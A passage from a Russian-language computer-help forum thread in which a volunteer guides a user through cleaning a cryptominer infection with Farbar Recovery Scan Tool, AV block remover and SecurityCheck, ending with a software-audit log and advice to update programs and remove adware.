FirewallRules: [TCP Query User{BCD3B8D6-A2C9-4AFD-88DA-E6EDD7A64E63}D:\barotrauma\barotrauma.exe] => (Allow) D:\barotrauma\barotrauma.exe => Нет файла
FirewallRules: [UDP Query User{16261BB5-964B-4DFC-9857-C2A11033E866}D:\barotrauma\barotrauma.exe] => (Allow) D:\barotrauma\barotrauma.exe => Нет файла
FirewallRules: [TCP Query User{62B8725B-BB86-4507-933D-F8CBDB51A372}D:\rail route v25.06.2021\rail route.exe] => (Allow) D:\rail route v25.06.2021\rail route.exe => Нет файла
FirewallRules: [UDP Query User{DEB0CA75-E165-43F3-800E-82A8B7559C46}D:\rail route v25.06.2021\rail route.exe] => (Allow) D:\rail route v25.06.2021\rail route.exe => Нет файла
Reboot:
End::

2. Скопируйте выделенный текст (правая кнопка мыши – Копировать).
3. Запустите Farbar Recovery Scan Tool.
4. Нажмите один раз на кнопку Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Пожалуйста, прикрепите его в следующем сообщении.

 

• Обратите внимание: будет выполнена перезагрузка компьютера.

 

Скачайте AV block remover.
Распакуйте, запустите и следуйте инструкциям.
В результате работы утилиты появится отчёт AV_block_remove.log, прикрепите его к следующему сообщению.

[Николай8911 0]

Удивился, когда мне предложили удалить пользователя "John", знать не знаю кто это был, но удалил.

AV_block_remove.log Fixlog.txt

[thyrex 1 468]

1 минуту назад, Николай8911 сказал:

Удивился, когда мне предложили удалить пользователя "John", знать не знаю кто это был, но удалил

А это от другого майнера. Любят они Вашу систему

 

Проблема решена?

[Николай8911 0]

Да, спасибо огромное. Целый день голову ломал.?

 

Изменено 5 июля, 2021 пользователем Николай8911

[thyrex 1 468]

Загрузите SecurityCheck by glax24 & Severnyj и сохраните утилиту на Рабочем столе.

• Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запустить от имени администратора (если Вы используете Windows Vista/7/8/10);
• Если увидите предупреждение от вашего фаервола относительно программы SecurityCheck, не блокируйте ее работу;
• Дождитесь окончания сканирования, откроется лог в Блокноте с именем SecurityCheck.txt;
• Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt;
• Процитируйте содержимое файла в своем следующем сообщении.

 

[Николай8911 0]

SecurityCheck by glax24 & Severnyj v.1.4.0.53 [27.10.17]
WebSite: www.safezone.cc
DateLog: 06.07.2021 12:33:59
Path starting: C:\Users\User\AppData\Local\Temp\SecurityCheck\SecurityCheck.exe
Log directory: C:\SecurityCheck\
IsAdmin: True
User: User
VersionXML: 8.90is-03.07.2021
___________________________________________________________________________

Windows 10(6.3.18362) (x64) Core Версия: 1903 Lang: Russian(0419)
Дата установки ОС: 03.10.2019 13:40:22
Статус лицензии: Windows(R), Core edition Windows находится в режиме уведомления
Статус лицензии: Office 15, OfficeProPlusVL_KMS_Client edition Windows находится в режиме уведомления
Статус лицензии: Office 16, Office16ProjectProR_Grace edition Windows находится в режиме уведомления
Режим загрузки: Normal
Браузер по умолчанию: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
Системный диск: ? ФС: [NTFS] Емкость: [140.3 Гб] Занято: [77.3 Гб] Свободно: [63 Гб]
------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.295.18362.0 Внимание! Скачать обновления
Контроль учётных записей пользователя включен (Уровень 3)
Центр обеспечения безопасности (wscsvc) - Служба работает
Удаленный реестр (RemoteRegistry) - Служба остановлена
Обнаружение SSDP (SSDPSRV) - Служба работает
Службы удаленных рабочих столов (TermService) - Служба работает
Служба удаленного управления Windows (WS-Management) (WinRM) - Служба остановлена
------------------------------ [ MS Office ] ------------------------------
Microsoft Office 2013 x86 v.15.0.4569.1506
---------------------------- [ Antivirus_WMI ] ----------------------------
Windows Defender (выключен и обновлен)
Kaspersky Free (включен и обновлен)
--------------------------- [ FirewallWindows ] ---------------------------
Брандмауэр Защитника Windows (mpssvc) - Служба работает
---------------------- [ AntiVirusFirewallInstall ] -----------------------
Kaspersky Free v.20.0.14.1085 Внимание! Скачать обновления
-------------------------- [ SecurityUtilities ] --------------------------
AnVir Task Manager v.9.3.3
--------------------------- [ OtherUtilities ] ----------------------------
Яндекс.Диск v.3.2.6.4175 Внимание! Скачать обновления
Steam v.2.10.91.91
Epic Games Launcher v.1.1.236.0
------------------------------ [ ArchAndFM ] ------------------------------
WinRAR 5.40 (64-bit) v.5.40.0 Внимание! Скачать обновления
7-Zip 19.00 v.19.00
------------------------------- [ Imaging ] -------------------------------
IrfanView 4.58 (64-bit) v.4.58
-------------------------- [ IMAndCollaborate ] ---------------------------
Discord v.0.0.309 Внимание! Скачать обновления
Zoom v.5.4.9 (59931.0110) Внимание! Скачать обновления
--------------------------------- [ P2P ] ---------------------------------
µTorrent v.3.5.5.46010 Внимание! Клиент сети P2P с рекламным модулем!.
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 231 (64-bit) v.8.0.2310.11 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u291-windows-x64.exe)^
Java 8 Update 241 v.8.0.2410.7 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u291-windows-i586.exe)^
------------------------------- [ Browser ] -------------------------------
Mozilla Firefox 79.0 (x64 ru) v.79.0 Внимание! Скачать обновления
^Проверьте обновления через меню Справка - О Firefox!^
Opera Stable 72.0.3815.400 v.72.0.3815.400 Внимание! Скачать обновления
^Проверьте обновления через меню О программе!^
Yandex v.20.11.2.80 Внимание! Скачать обновления
^Проверьте обновления через меню Дополнительно - О браузере Yandex!^
CCleaner Browser v.91.0.10364.117
Google Chrome v.91.0.4472.124
------------------ [ AntivirusFirewallProcessServices ] -------------------
Kaspersky Anti-Virus Service 20.0 (AVP20.0) - Служба работает
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Free 20.0\avp.exe v.20.0.14.1085
C:\Program Files (x86)\Kaspersky Lab\Kaspersky Free 20.0\avpui.exe v.20.0.21.1325
Malwarebytes Service (MBAMService) - Служба остановлена
Антивирусная программа "Защитника Windows" (WinDefend) - Служба остановлена
Служба проверки сети Windows Defender Antivirus (WdNisSvc) - Служба остановлена
---------------------------- [ UnwantedApps ] -----------------------------
Кнопка "Яндекс" на панели задач v.2.2.0.53 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
Hitman - Кровавые деньги / RePack by Edison007, 2011 / Full RUS Внимание! Нелицензионное ПО, репак, утилита активации, кряк или кейген.
Razer Cortex v.9.6.34.1043 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии.
Голосовой помощник Алиса v.5.0.0.1903 Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
uBlock Pro - #1 Adblocker 1.0.0.0 v.1.0.0.0 << Скрыта Внимание! Подозрение на Adware! Если данная программа Вам неизвестна, рекомендуется ее деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware и Malwarebytes AdwCleaner Перед деинсталляцией и сканированием обязательно проконсультируйтесь в теме форума, где Вам оказывается помощь!!!
Advanced System Optimizer v.3.9.3645.18056 Внимание! Подозрение на демо-версию антишпионской программы, программу для обновления драйверов, программу-оптимизатор или программу очистки реестра. Рекомендуется деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware. Возможно Вы стали жертвой обмана или социальной инженерии.
Менеджер браузеров v.3.0.7.830 << Скрыта Внимание! Приложение распространяется в рамках партнерских программ и сборников-бандлов. Рекомендуется деинсталляция. Возможно Вы стали жертвой обмана или социальной инженерии.
Desktop Wallpaper Manager, версия 2.1.72 v.2.1.72 Внимание! Подозрение на Adware! Если данная программа Вам неизвестна, рекомендуется ее деинсталляция и сканирование ПК с помощью Malwarebytes Anti-Malware и Malwarebytes AdwCleaner Перед деинсталляцией и сканированием обязательно проконсультируйтесь в теме форума, где Вам оказывается помощь!!!
----------------------------- [ End of Log ] ------------------------------
 

[thyrex 1 468]

Установите рекомендуемые обновленния программ + разберитесь с программами из секции UnwantedApps. На этом лечение будем считать завершенным.

[Николай8911 0]

Благодарю за помощь)

 

[thyrex 1 468]

Мы были рады Вам помочь! Надеемся, что Вы остались довольны результатом. На нашем форуме также можно получить компьютерную помощь, помощь по продуктам "Лаборатории Касперкого", обсудить технологии и технику, заказать эксклюзивную сувенирную продукцию "Лаборатории Касперского" бесплатно! Форумчане ежегодно путешествуют. В числе приглашенных в Турцию, Армению, Сочи, Камбоджу можете стать и Вы! Будем рады видеть Вас в наших рядах! Всегда ваш, фан-клуб "Лаборатории Касперского".